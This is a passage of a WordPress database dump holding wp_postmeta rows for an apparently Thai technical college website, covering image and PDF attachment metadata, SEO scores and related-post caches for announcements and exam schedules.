(11280, 5026, '_thumbnail_id', '5027'),
(11284, 5026, '_hide_featured', NULL),
(11285, 5026, '_yoast_wpseo_content_score', '30'),
(11286, 5026, '_yoast_wpseo_primary_category', '31'),
(11287, 5026, '_wpas_done_all', '1'),
(11288, 5029, '_edit_lock', '1547542095:3'),
(11289, 5029, '_edit_last', '3'),
(11290, 5030, '_wp_attached_file', '2019/01/50411518_743926745983516_6692624126042963968_n.jpg'),
(11291, 5030, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:579;s:4:\"file\";s:58:\"2019/01/50411518_743926745983516_6692624126042963968_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"50411518_743926745983516_6692624126042963968_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"50411518_743926745983516_6692624126042963968_n-300x181.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:181;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"50411518_743926745983516_6692624126042963968_n-768x463.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:463;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"50411518_743926745983516_6692624126042963968_n-400x241.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11292, 5029, '_thumbnail_id', '5030'),
(11296, 5029, '_hide_featured', NULL),
(11297, 5029, '_yoast_wpseo_content_score', '30'),
(11298, 5029, '_yoast_wpseo_primary_category', '31'),
(11299, 5029, '_wpas_done_all', '1'),
(11300, 5029, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575661748;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6054;}i:1;a:1:{s:2:\"id\";i:5091;}i:2;a:1:{s:2:\"id\";i:5388;}}}}'),
(11301, 5026, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574766097;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6141;}i:1;a:1:{s:2:\"id\";i:4098;}i:2;a:1:{s:2:\"id\";i:6138;}}}}'),
(11302, 5034, '_edit_lock', '1547691654:3'),
(11303, 5034, '_edit_last', '3'),
(11305, 5036, '_wp_attached_file', '2019/01/ประกาศ-ประกวดราคาจ้างก่อสร้างอาคารเรียนและปฏิบัติการพื้นที่ไม่ต่ำกว่า-๑๙๒๐-ตารางเมตร.pdf'),
(11309, 5034, '_hide_featured', NULL),
(11310, 5034, '_yoast_wpseo_content_score', '60'),
(11311, 5034, '_yoast_wpseo_primary_category', '3'),
(11312, 5034, '_wpas_done_all', '1');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(11313, 5034, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575683315;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5589;}i:1;a:1:{s:2:\"id\";i:5680;}i:2;a:1:{s:2:\"id\";i:5830;}}}}'),
(11314, 5038, '_edit_lock', '1547701728:3'),
(11315, 5038, '_edit_last', '3'),
(11316, 5039, '_wp_attached_file', '2019/01/17-1-2562-10-36-07.png'),
(11317, 5039, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:508;s:6:\"height\";i:706;s:4:\"file\";s:30:\"2019/01/17-1-2562-10-36-07.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"17-1-2562-10-36-07-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"17-1-2562-10-36-07-216x300.png\";s:5:\"width\";i:216;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"17-1-2562-10-36-07-216x300.png\";s:5:\"width\";i:216;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11318, 5040, '_wp_attached_file', '2019/01/49897473_744512145924976_4683805344030261248_o.jpg'),
(11319, 5040, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/49897473_744512145924976_4683805344030261248_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"49897473_744512145924976_4683805344030261248_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"49897473_744512145924976_4683805344030261248_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"49897473_744512145924976_4683805344030261248_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"49897473_744512145924976_4683805344030261248_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"49897473_744512145924976_4683805344030261248_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11320, 5038, '_thumbnail_id', '5040'),
(11324, 5038, '_hide_featured', NULL),
(11325, 5038, '_yoast_wpseo_content_score', '30'),
(11326, 5038, '_yoast_wpseo_primary_category', '31'),
(11327, 5038, '_wpas_done_all', '1'),
(11328, 5038, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575454542;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5094;}i:1;a:1:{s:2:\"id\";i:5104;}i:2;a:1:{s:2:\"id\";i:4994;}}}}'),
(11329, 5042, '_wp_attached_file', '2019/01/17-1-2562-16-17-39.png'),
(11330, 5042, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1819;s:6:\"height\";i:654;s:4:\"file\";s:30:\"2019/01/17-1-2562-16-17-39.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"17-1-2562-16-17-39-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"17-1-2562-16-17-39-300x108.png\";s:5:\"width\";i:300;s:6:\"height\";i:108;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"17-1-2562-16-17-39-768x276.png\";s:5:\"width\";i:768;s:6:\"height\";i:276;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"17-1-2562-16-17-39-1024x368.png\";s:5:\"width\";i:1024;s:6:\"height\";i:368;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"17-1-2562-16-17-39-400x144.png\";s:5:\"width\";i:400;s:6:\"height\";i:144;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11331, 5046, '_edit_lock', '1547829979:3'),
(11332, 5046, '_edit_last', '3'),
(11333, 5047, '_wp_attached_file', '2019/01/201901181800.pdf'),
(11337, 5046, '_hide_featured', NULL),
(11338, 5046, '_yoast_wpseo_content_score', '60'),
(11339, 5046, '_yoast_wpseo_primary_category', '3'),
(11340, 5046, '_wpas_done_all', '1'),
(11341, 5046, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575631120;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:4269;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(11342, 5049, '_edit_lock', '1547867576:1'),
(11343, 5049, '_edit_last', '1'),
(11344, 5050, '_wp_attached_file', '2019/01/V-NET-PVS2-2561.pdf'),
(11345, 5051, '_wp_attached_file', '2019/01/V-NET-PVC3-2561.pdf'),
(11346, 5051, '_cg_img_link', 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/V-NET-PVS2-2561.pdf'),
(11347, 5051, '_cg_link_target', ''),
(11348, 5052, '_wp_attached_file', '2019/01/อุปกรณ์เข้าห้องสอบ.jpg'),
(11349, 5052, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:639;s:4:\"file\";s:66:\"2019/01/อุปกรณ์เข้าห้องสอบ.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:66:\"อุปกรณ์เข้าห้องสอบ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:66:\"อุปกรณ์เข้าห้องสอบ-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:66:\"อุปกรณ์เข้าห้องสอบ-768x613.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:613;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:66:\"อุปกรณ์เข้าห้องสอบ-376x300.jpg\";s:5:\"width\";i:376;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11350, 5053, '_wp_attached_file', '2019/01/ตารางสอบ-ปวส2.jpg'),
(11351, 5053, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:801;s:6:\"height\";i:453;s:4:\"file\";s:47:\"2019/01/ตารางสอบ-ปวส2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"ตารางสอบ-ปวส2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"ตารางสอบ-ปวส2-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:47:\"ตารางสอบ-ปวส2-768x434.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:434;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:47:\"ตารางสอบ-ปวส2-400x226.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11352, 5054, '_wp_attached_file', '2019/01/ระเบียบเข้าห้องสอบ.jpg'),
(11353, 5054, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:564;s:4:\"file\";s:66:\"2019/01/ระเบียบเข้าห้องสอบ.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:66:\"ระเบียบเข้าห้องสอบ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:66:\"ระเบียบเข้าห้องสอบ-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:66:\"ระเบียบเข้าห้องสอบ-768x541.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:541;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:66:\"ระเบียบเข้าห้องสอบ-400x282.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11354, 5055, '_wp_attached_file', '2019/01/ตารางสอบ-ปวช3.jpg'),
(11355, 5055, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:801;s:6:\"height\";i:453;s:4:\"file\";s:47:\"2019/01/ตารางสอบ-ปวช3.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"ตารางสอบ-ปวช3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"ตารางสอบ-ปวช3-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:47:\"ตารางสอบ-ปวช3-768x434.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:434;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:47:\"ตารางสอบ-ปวช3-400x226.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11359, 5049, '_hide_featured', NULL),
(11360, 5049, '_yoast_wpseo_content_score', '90'),
(11361, 5049, '_yoast_wpseo_primary_category', '39'),
(11362, 5049, '_wpas_done_all', '1'),
(11363, 5049, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575459200;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5335;}i:1;a:1:{s:2:\"id\";i:6119;}i:2;a:1:{s:2:\"id\";i:5926;}}}}'),
(11368, 5049, '_wp_old_slug', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%aa%e0%b8%ad'),
(11369, 5059, '_edit_lock', '1548037471:3'),
(11370, 5059, '_edit_last', '3'),
(11371, 5060, '_wp_attached_file', '2019/01/ประกาศ-รายชื่อผู้ชนะการประะกวดราคาซื้อครุภัณฑ์-ชุดฝึกหุ่นยนต์อุตสาหกรรม-จำนวน-1-ชุด.pdf'),
(11375, 5059, '_hide_featured', NULL),
(11376, 5059, '_yoast_wpseo_content_score', '60'),
(11377, 5059, '_yoast_wpseo_primary_category', '3'),
(11378, 5059, '_wpas_done_all', '1'),
(11379, 5059, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575634539;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4781;}i:1;a:1:{s:2:\"id\";i:4803;}i:2;a:1:{s:2:\"id\";i:4672;}}}}'),
(11380, 5062, '_edit_lock', '1548754356:3'),
(11381, 5062, '_edit_last', '3'),
(11382, 5063, '_wp_attached_file', '2019/01/50049664_746313819078142_4963044996421779456_o.jpg'),
(11383, 5063, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/50049664_746313819078142_4963044996421779456_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"50049664_746313819078142_4963044996421779456_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"50049664_746313819078142_4963044996421779456_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"50049664_746313819078142_4963044996421779456_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"50049664_746313819078142_4963044996421779456_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"50049664_746313819078142_4963044996421779456_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11384, 5062, '_thumbnail_id', '5063'),
(11388, 5062, '_hide_featured', NULL),
(11389, 5062, '_yoast_wpseo_content_score', '30'),
(11390, 5062, '_yoast_wpseo_primary_category', '31'),
(11391, 5062, '_wpas_done_all', '1'),
(11392, 5065, '_edit_lock', '1548042991:3'),
(11393, 5065, '_edit_last', '3'),
(11394, 5066, '_wp_attached_file', '2019/01/50151314_746917052351152_1974965033741844480_o.jpg'),
(11395, 5066, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/50151314_746917052351152_1974965033741844480_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"50151314_746917052351152_1974965033741844480_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"50151314_746917052351152_1974965033741844480_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"50151314_746917052351152_1974965033741844480_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"50151314_746917052351152_1974965033741844480_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"50151314_746917052351152_1974965033741844480_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11396, 5065, '_thumbnail_id', '5066'),
(11400, 5065, '_hide_featured', NULL),
(11401, 5065, '_yoast_wpseo_content_score', '30'),
(11402, 5065, '_yoast_wpseo_primary_category', '31'),
(11403, 5065, '_wpas_done_all', '1'),
(11404, 5065, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575604275;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5294;}i:1;a:1:{s:2:\"id\";i:5062;}i:2;a:1:{s:2:\"id\";i:5381;}}}}'),
(11405, 5062, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575058799;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5294;}i:1;a:1:{s:2:\"id\";i:5065;}i:2;a:1:{s:2:\"id\";i:5381;}}}}'),
(11408, 5071, '_wp_attached_file', '2019/01/ปฏิทินรับสมัครสอบคัดเลือก-ปี62.jpg'),
(11409, 5071, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:96:\"2019/01/ปฏิทินรับสมัครสอบคัดเลือก-ปี62.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:96:\"ปฏิทินรับสมัครสอบคัดเลือก-ปี62-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:96:\"ปฏิทินรับสมัครสอบคัดเลือก-ปี62-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:97:\"ปฏิทินรับสมัครสอบคัดเลือก-ปี62-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:97:\"ปฏิทินรับสมัครสอบคัดเลือก-ปี62-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:96:\"ปฏิทินรับสมัครสอบคัดเลือก-ปี62-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11410, 5072, '_wp_attached_file', '2019/01/ขั้นตอนการสมัครเรียน-ปี62.jpg'),
(11411, 5072, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:81:\"2019/01/ขั้นตอนการสมัครเรียน-ปี62.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:81:\"ขั้นตอนการสมัครเรียน-ปี62-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:81:\"ขั้นตอนการสมัครเรียน-ปี62-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:82:\"ขั้นตอนการสมัครเรียน-ปี62-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:82:\"ขั้นตอนการสมัครเรียน-ปี62-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:81:\"ขั้นตอนการสมัครเรียน-ปี62-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11412, 5075, '_edit_lock', '1548062914:3'),
(11413, 5075, '_edit_last', '3'),
(11414, 5076, '_wp_attached_file', '2019/01/ประกาศ-รายชื่อผู้ชนะการประกวดราคาซื้อครุภัณฑ์หุ่นยนต์CMT-จำนวน-๑-ชุด.pdf'),
(11420, 5075, '_hide_featured', NULL),
(11421, 5075, '_yoast_wpseo_content_score', '30'),
(11422, 5075, '_yoast_wpseo_primary_category', '3'),
(11423, 5075, '_wpas_done_all', '1'),
(11424, 5080, '_edit_lock', '1548148981:3'),
(11425, 5080, '_edit_last', '3'),
